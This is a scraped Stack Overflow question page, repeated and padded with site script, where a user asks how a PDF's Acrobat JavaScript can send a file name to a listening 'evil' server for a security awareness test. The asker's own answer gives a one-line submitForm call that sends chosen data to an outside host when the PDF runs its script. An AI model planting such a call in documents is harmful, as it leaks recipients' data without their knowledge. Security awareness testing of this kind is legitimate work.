Send GET requests from a PDF file
I'm currently working on a security Proof Of Concept where I need to show the danger of opening unknown PDF file.
Internet says that many malware use Javascript in PDF document (AcroJS) to download their malicious payload.
My PoC is based on a victim who will demonstrate data leak based on opening a PDF file. I only needs to send the filename over Internet. I can write Javascript code which launch at document opening but the Net.HTTP.request function can only be used in trusted context.
So I don't see how to make a GET request to my listening "evil" website.
I read that sometimes hackers use vulnerabilities in Acrobat to do their bad, but many places talk about the native ability of AcroJS to permit GET request.
Is anyone knowing how to do a one way GET request (the answer of the server is not even interesting in this case).
Maybe is there a way to include a remote (non existent) picture so the PDF will make a GET request to the specified URL.
Or something like this.
Thanks for your help, I know this is really close to security concerns, but I think the answer needs acroJS skills (which are rare in security community).
Thanks
javascript pdf acrobat
add a comment |
I'm currently working on a security Proof Of Concept where I need to show the danger of opening unknown PDF file.
Internet says that many malware use Javascript in PDF document (AcroJS) to download their malicious payload.
My PoC is based on a victim who will demonstrate data leak based on opening a PDF file. I only needs to send the filename over Internet. I can write Javascript code which launch at document opening but the Net.HTTP.request function can only be used in trusted context.
So I don't see how to make a GET request to my listening "evil" website.
I read that sometimes hackers use vulnerabilities in Acrobat to do their bad, but many places talk about the native ability of AcroJS to permit GET request.
Is anyone knowing how to do a one way GET request (the answer of the server is not even interesting in this case).
Maybe is there a way to include a remote (non existent) picture so the PDF will make a GET request to the specified URL.
Or something like this.
Thanks for your help, I know this is really close to security concerns, but I think the answer needs acroJS skills (which are rare in security community).
Thanks
javascript pdf acrobat
1
Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.
– joelgeraci
Nov 15 '18 at 0:05
Okay, open a link in the browser in perfect for me, how to do that ?
– Sibwara
Nov 15 '18 at 8:42
And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)
– Sibwara
Nov 15 '18 at 9:14
add a comment |
I'm currently working on a security Proof Of Concept where I need to show the danger of opening unknown PDF file.
Internet says that many malware use Javascript in PDF document (AcroJS) to download their malicious payload.
My PoC is based on a victim who will demonstrate data leak based on opening a PDF file. I only needs to send the filename over Internet. I can write Javascript code which launch at document opening but the Net.HTTP.request function can only be used in trusted context.
So I don't see how to make a GET request to my listening "evil" website.
I read that sometimes hackers use vulnerabilities in Acrobat to do their bad, but many places talk about the native ability of AcroJS to permit GET request.
Is anyone knowing how to do a one way GET request (the answer of the server is not even interesting in this case).
Maybe is there a way to include a remote (non existent) picture so the PDF will make a GET request to the specified URL.
Or something like this.
Thanks for your help, I know this is really close to security concerns, but I think the answer needs acroJS skills (which are rare in security community).
Thanks
javascript pdf acrobat
I'm currently working on a security Proof Of Concept where I need to show the danger of opening unknown PDF file.
Internet says that many malware use Javascript in PDF document (AcroJS) to download their malicious payload.
My PoC is based on a victim who will demonstrate data leak based on opening a PDF file. I only needs to send the filename over Internet. I can write Javascript code which launch at document opening but the Net.HTTP.request function can only be used in trusted context.
So I don't see how to make a GET request to my listening "evil" website.
I read that sometimes hackers use vulnerabilities in Acrobat to do their bad, but many places talk about the native ability of AcroJS to permit GET request.
Is anyone knowing how to do a one way GET request (the answer of the server is not even interesting in this case).
Maybe is there a way to include a remote (non existent) picture so the PDF will make a GET request to the specified URL.
Or something like this.
Thanks for your help, I know this is really close to security concerns, but I think the answer needs acroJS skills (which are rare in security community).
Thanks
javascript pdf acrobat
javascript pdf acrobat
asked Nov 14 '18 at 23:29
SibwaraSibwara
11
11
1
Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.
– joelgeraci
Nov 15 '18 at 0:05
Okay, open a link in the browser in perfect for me, how to do that ?
– Sibwara
Nov 15 '18 at 8:42
And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)
– Sibwara
Nov 15 '18 at 9:14
add a comment |
1
Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.
– joelgeraci
Nov 15 '18 at 0:05
Okay, open a link in the browser in perfect for me, how to do that ?
– Sibwara
Nov 15 '18 at 8:42
And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)
– Sibwara
Nov 15 '18 at 9:14
1
1
Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.
– joelgeraci
Nov 15 '18 at 0:05
Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.
– joelgeraci
Nov 15 '18 at 0:05
Okay, open a link in the browser in perfect for me, how to do that ?
– Sibwara
Nov 15 '18 at 8:42
Okay, open a link in the browser in perfect for me, how to do that ?
– Sibwara
Nov 15 '18 at 8:42
And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)
– Sibwara
Nov 15 '18 at 9:14
And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)
– Sibwara
Nov 15 '18 at 9:14
add a comment |
1 Answer
1
active
oldest
votes
Okay I find a way by using :
this.submitForm("http://mydomain.fr/var="+thedataIwant);
The user is prompted about a HTTP connection tentative but this is the vigilance I want to test for.
The articles of this guy help me a lot: https://acrobatusers.com/tutorials/author/parker
add a comment |
Your Answer
StackExchange.ifUsing("editor", function ()
StackExchange.using("externalEditor", function ()
StackExchange.using("snippets", function ()
StackExchange.snippets.init();
);
);
, "code-snippets");
StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "1"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);
else
createEditor();
);
function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);
);
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53310315%2fsend-get-requests-from-a-pdf-file%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
1 Answer
1
active
oldest
votes
1 Answer
1
active
oldest
votes
active
oldest
votes
active
oldest
votes
Okay I find a way by using :
this.submitForm("http://mydomain.fr/var="+thedataIwant);
The user is prompted about a HTTP connection tentative but this is the vigilance I want to test for.
The articles of this guy help me a lot: https://acrobatusers.com/tutorials/author/parker
add a comment |
Okay I find a way by using :
this.submitForm("http://mydomain.fr/var="+thedataIwant);
The user is prompted about a HTTP connection tentative but this is the vigilance I want to test for.
The articles of this guy help me a lot: https://acrobatusers.com/tutorials/author/parker
add a comment |
Okay I find a way by using :
this.submitForm("http://mydomain.fr/var="+thedataIwant);
The user is prompted about a HTTP connection tentative but this is the vigilance I want to test for.
The articles of this guy help me a lot: https://acrobatusers.com/tutorials/author/parker
Okay I find a way by using :
this.submitForm("http://mydomain.fr/var="+thedataIwant);
The user is prompted about a HTTP connection tentative but this is the vigilance I want to test for.
The articles of this guy help me a lot: https://acrobatusers.com/tutorials/author/parker
answered Nov 15 '18 at 17:18
SibwaraSibwara
11
11
add a comment |
add a comment |
Thanks for contributing an answer to Stack Overflow!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53310315%2fsend-get-requests-from-a-pdf-file%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
1
Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.
– joelgeraci
Nov 15 '18 at 0:05
Okay, open a link in the browser in perfect for me, how to do that ?
– Sibwara
Nov 15 '18 at 8:42
And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)
– Sibwara
Nov 15 '18 at 9:14